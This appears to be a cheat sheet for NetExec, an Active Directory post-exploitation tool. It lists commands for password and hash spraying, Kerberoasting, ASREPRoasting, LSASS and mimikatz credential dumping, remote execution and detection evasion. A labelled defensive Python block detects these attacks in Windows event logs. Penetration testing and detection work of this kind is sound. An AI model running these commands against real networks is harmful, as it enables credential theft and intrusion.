NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks through network protocol abuse and credential attacks.

Installation & Setup

| Command | Description |
|---|---|
| `pip3 install netexec` | Install NetExec via pip |
| `pipx install netexec` | Install with pipx (recommended) |
| `git clone https://github.com/Pennyw0rth/NetExec.git` | Clone from GitHub |
| `cd NetExec && pip3 install .` | Install from source |
| `netexec --version` | Check installed version |
| `netexec --help` | Display help information |

Basic Usage

| Command | Description |
|---|---|
| `netexec smb 192.168.1.0/24` | Scan SMB on subnet |
| `netexec smb 192.168.1.100 -u username -p password` | Authenticate with credentials |
| `netexec smb 192.168.1.100 -u username -H ntlmhash` | Authenticate with NTLM hash |
| `netexec smb 192.168.1.100 -u '' -p ''` | Anonymous authentication |
| `netexec smb targets.txt -u username -p password` | Use target file |

Protocol Support

SMB Protocol

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100` | Basic SMB enumeration |
| `netexec smb 192.168.1.100 --shares` | Enumerate shares |
| `netexec smb 192.168.1.100 --users` | Enumerate users |
| `netexec smb 192.168.1.100 --groups` | Enumerate groups |
| `netexec smb 192.168.1.100 --local-groups` | Enumerate local groups |
| `netexec smb 192.168.1.100 --sessions` | Enumerate sessions |
| `netexec smb 192.168.1.100 --disks` | Enumerate disks |

WinRM Protocol

| Command | Description |
|---|---|
| `netexec winrm 192.168.1.100 -u username -p password` | WinRM authentication |
| `netexec winrm 192.168.1.100 -u username -p password -x "whoami"` | Execute command |
| `netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1` | Execute PowerShell script |

LDAP Protocol

| Command | Description |
|---|---|
| `netexec ldap 192.168.1.100 -u username -p password` | LDAP authentication |
| `netexec ldap 192.168.1.100 -u username -p password --users` | Enumerate LDAP users |
| `netexec ldap 192.168.1.100 -u username -p password --groups` | Enumerate LDAP groups |
| `netexec ldap 192.168.1.100 -u username -p password --computers` | Enumerate computers |

MSSQL Protocol

| Command | Description |
|---|---|
| `netexec mssql 192.168.1.100 -u username -p password` | MSSQL authentication |
| `netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"` | Execute SQL query |
| `netexec mssql 192.168.1.100 -u username -p password --local-auth` | Local authentication |

SSH Protocol

| Command | Description |
|---|---|
| `netexec ssh 192.168.1.100 -u username -p password` | SSH authentication |
| `netexec ssh 192.168.1.100 -u username -k id_rsa` | SSH key authentication |
| `netexec ssh 192.168.1.100 -u username -p password -x "id"` | Execute command |

Authentication Methods

Password Authentication

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -u username -p password` | Single credential |
| `netexec smb 192.168.1.100 -u users.txt -p passwords.txt` | Credential lists |
| `netexec smb 192.168.1.100 -u username -p passwords.txt` | Password spraying |
| `netexec smb 192.168.1.100 -u users.txt -p password` | User enumeration |

Hash Authentication

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -u username -H ntlmhash` | NTLM hash |
| `netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash` | LM:NTLM hash |
| `netexec smb 192.168.1.100 -u users.txt -H hashes.txt` | Hash lists |

Kerberos Authentication

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -u username -p password -k` | Kerberos authentication |
| `netexec smb 192.168.1.100 -u username --use-kcache` | Use Kerberos cache |
| `netexec smb 192.168.1.100 -u username -p password --kerberos` | Force Kerberos |

Enumeration

Share Enumeration

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --shares` | List shares |
| `netexec smb 192.168.1.100 --shares -u username -p password` | Authenticated share listing |
| `netexec smb 192.168.1.100 --spider SHARE` | Spider share contents |
| `netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt"` | Search for files |

User Enumeration

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --users` | Enumerate users |
| `netexec smb 192.168.1.100 --rid-brute` | RID bruteforce |
| `netexec smb 192.168.1.100 --users --rid-brute 1000-2000` | RID range |

Group Enumeration

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --groups` | Enumerate groups |
| `netexec smb 192.168.1.100 --local-groups` | Local groups |
| `netexec smb 192.168.1.100 --groups "Domain Admins"` | Specific group |

Computer Enumeration

| Command | Description |
|---|---|
| `netexec ldap 192.168.1.100 --computers` | Enumerate computers |
| `netexec smb 192.168.1.100 --computers` | SMB computer enumeration |

Command Execution

SMB Command Execution

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -u username -p password -x "whoami"` | Execute command |
| `netexec smb 192.168.1.100 -u username -p password -X script.ps1` | Execute PowerShell script |
| `netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec` | Use WMI execution |
| `netexec smb 192.168.1.100 -u username -p password --exec-method smbexec` | Use SMB execution |

WinRM Command Execution

| Command | Description |
|---|---|
| `netexec winrm 192.168.1.100 -u username -p password -x "Get-Process"` | PowerShell command |
| `netexec winrm 192.168.1.100 -u username -p password -X script.ps1` | Execute script |

Modules

Built-in Modules

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -M spider_plus` | Enhanced spidering |
| `netexec smb 192.168.1.100 -M enum_avproducts` | Enumerate AV products |
| `netexec smb 192.168.1.100 -M gpp_password` | Group Policy Preferences |
| `netexec smb 192.168.1.100 -M lsassy` | LSASS dumping |
| `netexec smb 192.168.1.100 -M mimikatz` | Mimikatz execution |

Module Options

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false` | Module options |
| `netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true` | BloodHound output |

Database Operations

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --users --export users.csv` | Export to CSV |
| `netexec db` | Database management |
| `netexec db --workspace default` | Set workspace |
| `netexec db --clear-database` | Clear database |

Advanced Features

Credential Stuffing

| Command | Description |
|---|---|
| `netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success` | Continue on success |
| `netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3` | Fail limit |

Password Policy

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --pass-pol` | Get password policy |
| `netexec ldap 192.168.1.100 --pass-pol` | LDAP password policy |

BloodHound Integration

| Command | Description |
|---|---|
| `netexec ldap 192.168.1.100 -u username -p password --bloodhound` | Collect BloodHound data |
| `netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All` | All collections |

ASREPRoast

| Command | Description |
|---|---|
| `netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt` | ASREPRoast attack |
| `netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt` | Authenticated ASREPRoast |

Kerberoasting

| Command | Description |
|---|---|
| `netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt` | Kerberoasting attack |

Output and Logging

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --verbose` | Verbose output |
| `netexec smb 192.168.1.100 --debug` | Debug output |
| `netexec smb 192.168.1.100 -o output.txt` | Save output to file |
| `netexec smb 192.168.1.100 --log logs/` | Log directory |

Configuration

Config File (~/.nxc/nxc.conf)

```ini
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0
```

Protocol-specific Options

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --port 445` | Custom port |
| `netexec smb 192.168.1.100 --timeout 5` | Connection timeout |
| `netexec smb 192.168.1.100 --threads 100` | Thread count |

Evasion Techniques

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 --jitter 1-5` | Random delay |
| `netexec smb 192.168.1.100 --delay 2` | Fixed delay |
| `netexec smb 192.168.1.100 --obfs` | Obfuscation |

Common Attack Scenarios

Domain Enumeration

```bash
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```

Credential Attacks

```bash
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```
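From the defender's side, the password spraying and ASREPRoast runs in the Credential Attacks block above, and the Kerberoasting command listed earlier, each leave a characteristic trace in the domain controller's Security log. The following detection logic is an added example written for this page; it is not NetExec's code and does not come from the project. It runs over constructed Windows Security event records embedded inline (event IDs 4625, 4768 and 4769, with field names as they appear in the Security log; the IPs, account names, SPNs and timestamps are made up). The thresholds (five distinct accounts from one source within five minutes, three RC4 service tickets from one account) are assumptions to be tuned for a real environment.

```python
"""Flag password spraying, Kerberoasting and AS-REP roasting patterns in
Windows Security events (4625, 4769, 4768). Sample events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names follow the Security
# log; hosts, accounts, SPNs and timestamps are made up for this example.
SAMPLE_EVENTS = [
    # One source failing against six different accounts within a few seconds.
    *[{"EventID": 4625, "TimeCreated": f"2024-01-15T09:00:{i:02d}",
       "TargetUserName": u, "IpAddress": "10.0.0.50", "SubStatus": "0xC000006A"}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])],
    # One user mistyping a password twice: not a spray.
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:05:00", "TargetUserName": "grace",
     "IpAddress": "10.0.0.77", "SubStatus": "0xC000006A"},
    {"EventID": 4625, "TimeCreated": "2024-01-15T09:05:10", "TargetUserName": "grace",
     "IpAddress": "10.0.0.77", "SubStatus": "0xC000006A"},
    # One account pulling RC4 (0x17) service tickets for three user-owned SPNs.
    *[{"EventID": 4769, "TimeCreated": f"2024-01-15T09:10:{i:02d}",
       "TargetUserName": "alice@CORP", "ServiceName": s,
       "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"}
      for i, s in enumerate(["svc_sql", "svc_web", "svc_backup"])],
    # Routine AES (0x12) service ticket for a computer account.
    {"EventID": 4769, "TimeCreated": "2024-01-15T09:11:00", "TargetUserName": "bob@CORP",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.60"},
    # TGT issued with no pre-authentication (PreAuthType 0) and RC4: roastable.
    {"EventID": 4768, "TimeCreated": "2024-01-15T09:12:00", "TargetUserName": "svc_legacy",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    # Routine TGT with encrypted-timestamp pre-authentication (PreAuthType 2).
    {"EventID": 4768, "TimeCreated": "2024-01-15T09:12:05", "TargetUserName": "carol",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.61"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def detect_password_spray(events, min_users=5, window=timedelta(minutes=5)):
    """One source IP failing (4625) against >= min_users distinct accounts inside
    a sliding time window. Repeated failures for a single account do not count."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4625:
            by_ip[ev["IpAddress"]].append(ev)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=_ts)
        best, start = set(), 0
        for end in range(len(evs)):
            while _ts(evs[end]) - _ts(evs[start]) > window:
                start += 1
            users = {e["TargetUserName"] for e in evs[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            findings.append({"source": ip, "users": sorted(best)})
    return findings


def detect_kerberoasting(events, min_services=3):
    """One account requesting RC4 (0x17) service tickets (4769) for >= min_services
    distinct SPNs, ignoring computer accounts ($) and krbtgt."""
    by_account = defaultdict(set)
    for ev in events:
        if (ev["EventID"] == 4769 and ev["TicketEncryptionType"] == "0x17"
                and not ev["ServiceName"].endswith("$")
                and ev["ServiceName"] != "krbtgt"):
            by_account[ev["TargetUserName"]].add(ev["ServiceName"])
    return [{"account": a, "services": sorted(s)}
            for a, s in by_account.items() if len(s) >= min_services]


def detect_asrep_roast(events):
    """TGT requests (4768) served without pre-authentication (PreAuthType 0). Only
    accounts with 'Do not require Kerberos preauthentication' set produce these."""
    return [{"account": ev["TargetUserName"], "source": ev["IpAddress"]}
            for ev in events
            if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"]


def run_all(events=SAMPLE_EVENTS):
    return {"spray": detect_password_spray(events),
            "kerberoast": detect_kerberoasting(events),
            "asrep": detect_asrep_roast(events)}


if __name__ == "__main__":
    for kind, hits in run_all().items():
        print(f"{kind}: {hits}")
```

Spraying is distinguished from an ordinary lockout by counting distinct accounts per source rather than failures per account; Kerberoasting by the encryption type, since RC4 (0x17) tickets are what offline cracking targets, so enforcing AES on service accounts and removing unneeded SPNs reduces exposure; and AS-REP roasting only yields a 4768 with PreAuthType 0 for accounts that have pre-authentication disabled, so auditing that attribute is the matching mitigation. In production the same functions would be fed from a SIEM query instead of the inline list.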

Post-Exploitation

```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# BloodHound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
```

Integration with Other Tools

Impacket Integration

| Command | Description |
|---|---|
| `netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec` | Use Impacket WMI |
| `netexec smb 192.168.1.100 -u username -p password --exec-method smbexec` | Use Impacket SMB |

CrackMapExec Migration

| Command | Description |
|---|---|
| `netexec --convert-cme-db` | Convert CME database |
| `alias cme='netexec'` | Create alias for compatibility |

Troubleshooting

| Command | Description |
|---|---|
| `netexec --help` | General help |
| `netexec smb --help` | Protocol-specific help |
| `netexec -v` | Version information |
| `netexec --debug smb 192.168.1.100` | Debug mode |

Best Practices

  • Use authentication before enumeration when possible
  • Implement proper delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging for documentation
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Only use on authorized networks
  • Implement proper access controls
  • Monitor for detection by security tools
  • Use least privilege principles
  • Document all activities for compliance
  • Coordinate with blue team when applicable
  • Implement proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication when possible
  • Regular updates to maintain effectiveness